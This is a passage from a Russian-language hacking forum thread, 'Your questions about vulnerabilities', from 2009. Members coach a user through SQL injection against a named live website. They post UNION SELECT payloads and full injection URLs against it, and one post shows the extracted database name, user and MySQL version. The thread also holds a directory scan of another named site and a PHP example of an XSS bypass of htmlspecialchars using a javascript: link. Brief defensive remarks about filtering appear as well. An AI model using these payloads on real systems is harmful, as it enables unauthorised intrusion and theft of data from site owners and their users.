Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. vorona

    vorona Member

    Joined:
    7 Sep 2009
    Messages:
    392
    Likes Received:
    7
    Reputations:
    1
    самого htmlspecialchar достаточно??
     
  2. fng

    fng New Member

    Joined:
    12 Nov 2009
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Пытаюсь делать SQL-инъекцию на одном ресурсе, при подстановке кавычки ко всем параметрам, которые проверил выводятся ворнинги такого плана:

    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ...

    Можно ли что-то сделать с этими параметрами?
     
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    fng:

    может и можно, а может и нельзя - ссылку в студию, попробуй перечитай свой вопрос и осознай, что разговариваешь с Землянами, а не с гуманоидными существами из галактики бетта, которые в совершенстве познали телепатию
     
  4. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    2Pashkela, могут конечно быть дефекты, но все зависит от того что и где ты фильтруешь.

    P.S.: к стати, замечал на какой то из версий воблы используеться эта ф-я в ббкодах, действительно были дефекты. Но данная функция далеко не единственный способ защиты ;)
     
  5. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    Обсуждалось уже, htmlspecialchars() тоже обходиться.
     
  6. vorona

    vorona Member

    Joined:
    7 Sep 2009
    Messages:
    392
    Likes Received:
    7
    Reputations:
    1
    как? О_о
     
  7. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    show must go on
     
  8. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    Как ты пытаешься провести инъект, если ты даже не знаешь что он тебе отвечает?

    order by 10000 --
    order by 1 --
    order by 4 --

    union select 1,2,3,4 --

    выводит 2,4 например

    union select 1,concat_ws(0x3a,version(),user()),3,4 --
     
  9. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    По одиночку все обходится, но в сумме с еще несколькими ф-ями + регулярками получится неплохой фильтр, естественно если понимать что к чему.

    Но этот вопрос, ИМХО, не сюда нужно адавать, а в кодинг.
     
    #9989 Ins3t, 12 Nov 2009
    Last edited: 12 Nov 2009
  10. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    ну вот просканировал я директори, получилось вот что:
    Found [403]: mtl-consultants.com/.htaccess
    Found [403]:site.com/.htaccess~
    Found [403]: site.com/.htpasswd
    Found [403]: site.com/.htpasswd~
    Found [200]: .com/_notes/
    Found [403]: .com/cgi-bin/
    Found [403]: .com/cgi-sys/
    Found [301]: .com/cpanel/
    Found [200]: .com/email/
    Found [301]: .com/images
    Found [403]: .com/mailman
    Found [301]: .com/pipermail
    Found [301]: .com/webmail
    Found [403]: .com/~root

    а что дальше? объясни плиз
     
  11. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    А если например не изобретать непонятный велосипед, который возможно рухнет под интеллектуальным натиском, заюзать например пхп-класс который фильтрует всё и вся - PHP Input Filter
     
  12. vorona

    vorona Member

    Joined:
    7 Sep 2009
    Messages:
    392
    Likes Received:
    7
    Reputations:
    1
    как обходится htmlspecialchars??
     
  13. fng

    fng New Member

    Joined:
    12 Nov 2009
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    n-sider.com
    вот этот ресурс...

    статьи я читал, но по этой ошибке не нашел инфы к сожалению
    количество полей не получилось подобрать
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    1. UTF-7
    2. Если значение после обработки htmlspecialchars попадает в ссылку, например "URL домашней странички", что с успехом подтверждает следующий код:

    PHP:
    <?php 
    $a 
    "javascript:document.write('<script>alert(0)</script>');";
    $data htmlspecialchars($a); 
    echo 
    "<a href=$data>Tikni</a>";
    ?>
    просто запустите и удивитесь сильно

    PS: Посмотрите исходники странички перед тем, как тыкнуть, и ваще опупейте
     
    #9994 Pashkela, 12 Nov 2009
    Last edited: 12 Nov 2009
    2 people like this.
  15. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    ну как бэ если на то пошло,то лучше будет для начала версию пробить,т.е. если 4.0 мускул union не катит
    +and+substring(version(),1,1)=4
     
  16. LzD

    LzD Banned

    Joined:
    24 Jul 2009
    Messages:
    51
    Likes Received:
    12
    Reputations:
    2
    http://www.n-sider.com/gameview.php?gameid=46+AND+1=2+UNION+SELECT+1,2--
    [+] Current Database : nsider
    [+] Database User : [email protected]
    [+] MySQL Version : 5.0.67-userstats-log
     
  17. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    2fng,

    Code:
    http://www.n-sider.com/gameview.php?gameid=-6399'+union+select+1,2,version(),4,5--+&view=screens
    
    вывод в свойставх картинки
     
  18. fng

    fng New Member

    Joined:
    12 Nov 2009
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    спасибо парни, вроде так же делал, не заметил может вывод...
     
  19. vorona

    vorona Member

    Joined:
    7 Sep 2009
    Messages:
    392
    Likes Received:
    7
    Reputations:
    1
    Я в шоке!!! А что делать??
     
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Как бы ужасно это не звучало, но htmlentities приведет к тому же результату :)

    А вот strip_tags решит проблему

    PS: Надеюсь многолетние ламерские споры на этом закончатся
     
    #10000 Pashkela, 12 Nov 2009
    Last edited: 12 Nov 2009
Thread Status:
Not open for further replies.